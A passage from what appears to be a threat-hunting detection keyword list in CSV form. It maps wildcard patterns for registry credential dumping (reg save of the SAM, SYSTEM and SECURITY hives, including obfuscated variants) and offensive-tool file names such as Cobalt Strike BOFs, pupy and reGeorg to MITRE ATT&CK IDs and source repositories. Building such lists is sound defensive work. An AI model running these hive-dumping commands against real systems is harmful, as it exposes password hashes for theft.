-*reg query hklm\software\realvnc\Allusers\vncserver*,greyware_tool_keyword,reg,Query the Windows registry sensitive informations,T1012 - T1003.002,TA0007 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A
-*reg query hklm\software\realvnc\vncserver*,greyware_tool_keyword,reg,Query the Windows registry sensitive informations,T1012 - T1003.002,TA0007 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A
-*reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags*,greyware_tool_keyword,reg,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z
-*reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential*,greyware_tool_keyword,reg,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z
-"*reg save ""HK""L""""M\s""""a""""m"""" win32.dll*",greyware_tool_keyword,reg,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z
-"*reg save ""HK""L""""M\s""""ys""""t""em"" win32.exe*",greyware_tool_keyword,reg,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z
-"*reg save ""HK*L*M\s*ec*u*rit*y*"" update.exe*",greyware_tool_keyword,reg,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z
-*reg save hklm\sam *.dat*,greyware_tool_keyword,reg,saves a copy of the registry hive hklm\sam to a .dat file,T1005 - T1003.002,TA0005 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A
-*reg save hklm\sam 1337*,offensive_tool_keyword,SamDumpCable,Dump users sam and system hive and exfiltrate them,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z
-*reg save HKLM\SAM c:*,greyware_tool_keyword,reg,the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.,T1003.002,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*reg save hklm\sam sam*,greyware_tool_keyword,reg,the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.,T1003.002,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*reg save hklm\system *.dat*,greyware_tool_keyword,reg,saves a copy of the registry hive hklm\system to a .dat file,T1005 - T1003.002,TA0005 - TA0003,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A
-*reg save hklm\system 1337*,offensive_tool_keyword,SamDumpCable,Dump users sam and system hive and exfiltrate them,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z
-*reg save HKLM\SYSTEM c:*,greyware_tool_keyword,reg,the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.,T1003.002,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A
-*reg save hklm\system system*,greyware_tool_keyword,reg,the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts.
By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.,T1003.002,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*reg.exe save HKLM\SAM sam_*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*reg.exe save hklm\sam*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*reg.exe save HKLM\SECURITY security_*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*reg.exe save hklm\security*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*reg.exe save HKLM\SYSTEM sys*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,0,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z 
-*reg.exe save hklm\system*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*reg.py *@* save -keyName 'HKLM\SAM*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*reg.py *@* save -keyName 'HKLM\SECURITY*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*reg.py *@* save -keyName 'HKLM\SYSTEM*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*reGeorg-master*,offensive_tool_keyword,reGeorg,The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.,T1090 - T1095 - T1572,TA0002 - TA0007 - ,N/A,N/A,Data Exfiltration,https://github.com/sensepost/reGeorg,1,1,N/A,N/A,10,2828,844,2020-11-04T10:36:24Z,2014-08-08T00:58:12Z -*reGeorgSocksProxy.py*,offensive_tool_keyword,reGeorg,The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.,T1090 - T1095 - T1572,TA0002 - TA0007 - ,N/A,N/A,Data Exfiltration,https://github.com/sensepost/reGeorg,1,1,N/A,N/A,10,2828,844,2020-11-04T10:36:24Z,2014-08-08T00:58:12Z -*register-python-argcomplete --no-defaults exegol*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*registry_hijacking_eventvwr*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*registry_hijacking_fodhelper*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*RegistryImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*registry-read.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*RegistryTinker.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*RegReeper.7z*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*RegReeper.cpp*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*RegReeper.exe*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*RegReeper.sln*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*RegReeper.vcxproj*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*Reg-Restore-Persistence-Mole-main*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,1,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*regsvr32.exe /s /n /u /i: * scrobj.dll*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,0,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*regsvr32_command_delivery_server*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*reinstall_original_pw.py*,offensive_tool_keyword,POC,Zerologon CVE exploitation,T1210 - T1068,TA0001,N/A,N/A,Exploitation tools,https://github.com/risksense/zerologon,1,1,N/A,N/A,6,555,144,2020-10-15T18:31:15Z,2020-09-14T19:19:07Z -*rekallreader.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*relay*/utils/enum.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*RelayPackets.py*,offensive_tool_keyword,responder,LLMNR. 
NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*Release of BloodHound*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*REM Title: Harvester_OF_SORROW*,offensive_tool_keyword,Harvester_OF_SORROW,The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.,T1056.001 - T1113 - T1512 - T1566.001 - T1059.006,TA0004 - TA0009 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*RemAdm*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword for remote administration tools ,T1021 - T1027 - T1046 - T1057 - T1068 - T1072 - T1078 - T1135 - T1485 - T1489 - T1497 - T1547,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*remiflavien1/nse-install*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*remiflavien1/recon-archy*,offensive_tool_keyword,recon-archy,Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title,T1583 - T1059.001 - T1059.003,TA0002 - 
TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/recon-archy,1,0,N/A,7,1,12,1,2020-08-04T11:26:42Z,2020-06-25T14:38:51Z -*-remote -destPipe * -pipeHost * -destHost *,offensive_tool_keyword,invoke-piper,Forward local or remote tcp ports through SMB pipes.,T1003.001 - T1048 - T1021.002 - T1021.001 - T1090,TA0002 -TA0006 - TA0008,N/A,N/A,Lateral movement,https://github.com/p3nt4/Invoke-Piper,1,0,N/A,N/A,3,284,60,2021-03-07T19:07:01Z,2017-08-03T08:06:44Z -*Remote/lastpass/lastpass.x86.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*Remote/setuserpass/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*Remote/shspawnas*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z 
-*Remote/suspendresume/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*remote_exploit.erb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*remote_exploit_cmd_stager.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 